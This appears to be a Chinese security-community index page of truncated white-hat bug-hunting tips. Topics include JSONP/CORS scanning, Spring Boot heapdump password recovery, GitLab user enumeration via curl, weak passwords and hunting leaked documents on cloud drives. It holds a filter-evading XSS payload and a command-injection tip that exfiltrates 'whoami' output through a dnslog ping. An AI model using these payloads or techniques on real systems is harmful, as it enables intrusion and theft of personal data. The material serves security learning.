利用burp插件进行被动式扫描可以极大提高挖洞效率，由p1g3写的这两个插件会自动收集通过burp的jsonp、cors跨域请求，只需人工筛选响应中带有敏感信息的请求并进行利用即可： http://github.com/...

白帽训练营的第一个主题信息收集。在我们渗透测试/漏洞挖掘过程中，信息收集是一个相对比较重要的阶段，有助于我们扩大攻击面。 ?文章内容需登陆状态才能查看，没有安全小天地平台账号的用户请...

漏洞报告 Shopify 【50000刀】#1087489 Github access token exposure 今日最佳：这哥们在GitHub上发现Shopify员工开发的一个Electron应用，里面有Github access token，可以用于访问Shopify的g...

Spring Boot Actuator未授权访问发现/env中有数据库连接配置信息，但是密码都是*号，这时可以尝试是否可以下载heapdump，在内存信息中找到对应的密码。 用工具Eclipse Memory Analyzer（MAT）（...

相信在座的各位都是混迹各大社区论坛很久了 常见的信息收集文章基本上就那些，今天在这里补充一些特别的技巧吧！！！大佬勿喷！！！ 0X01字典制作篇 tesla.cn为例子 在线子域名查询 tesla.cn前...

欢迎大家踊跃评论在渗透过程中碰到的弱口令。 由于人性的弱点，弱口令总是普遍存在着。弱口令也成为我们拿下权限的有力手段之一，高端的渗透总是这么朴实无法且枯燥。 PDF下载地址：http://zone...

打开xxx.com，f12翻js文件， 里面一堆接口，但只有查找menu列表的接口可以访问，http://xxx.com/api/v1/menu/list js文件中没有添加和删除menu信息的接口，但是之前搞过类似的，这里就想着构造...

payload：'<sCriPt>setTimeout('ale'%2b'rt(/XSS/)',0)</sCriPt> 网站记录用户的历史查询记录往往都是以cookie的方式保存，安全策略往往很少覆盖到这类数据，该类型漏洞可当作xss的...

学习的本质是模仿，创造的精髓在洞察。 1、如何学习web安全？ 2、如何挖到第一个漏洞？ 我的答案是： 1、掌握最基本的信息收集技巧 2、理解http数据包 3、使用burp进行http流量的截断和重放 4、...

一、引子 当一个新漏洞被曝光后，如何才能快速在互联网上找到相关资产？ 网络空间搜索引擎是一个不错的选择，例如FOFA、shodan等。 举个例子，这几天新爆了一个“Yapi认证用户利用Mock功能远程...

FOFA指纹：app='gitlab' curl -s http://git.huoxian.cn/api/v4/users/{userid} | jq 文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

尝试寻找试用平台，这样可免费开通账号权限，免去登录认证，寻找更多后台存在的漏洞！搜关键字+免费试用、xxx技术支持或者直接搜备案信息，有大量免费试用平台的厂商： 申请试用权限后在后台用...

通过企业名+关键词的方法进行排查，常见关键词有：合同，设计图纸，身份证，通讯录，花名册，报表，投标文件，入职等。 情报提交时说明网盘链接和截图，方便厂商排查即可。 推荐几个本人常用的...

文件上传表单中出现的命令注入漏洞，常出现在filename或path参数中，可以使用sleep 5确认响应延时后再用ping whoami.xxx.dnslog.cn获取命令执行结果： 文字来源于- 火线 Zone-云安全社区，安全...

在安全小天地平台的火器中看到一个资产，居然是空白页面，空白页面就没有漏洞？？？偏偏不信邪，上手就是干！ http://xxx.target.com 打开页面啥也没有，一片空白 F12看下JS中的API接口，发现有...

让dirsearch充当爬虫的角色，xray对其传入的流量进行扫描。 xray：xray.exe webscan --listen 127.0.0.1:7776 --html-output reportdatetime.html dirsearch：-L URLLIST, --url-list=URLLIST ...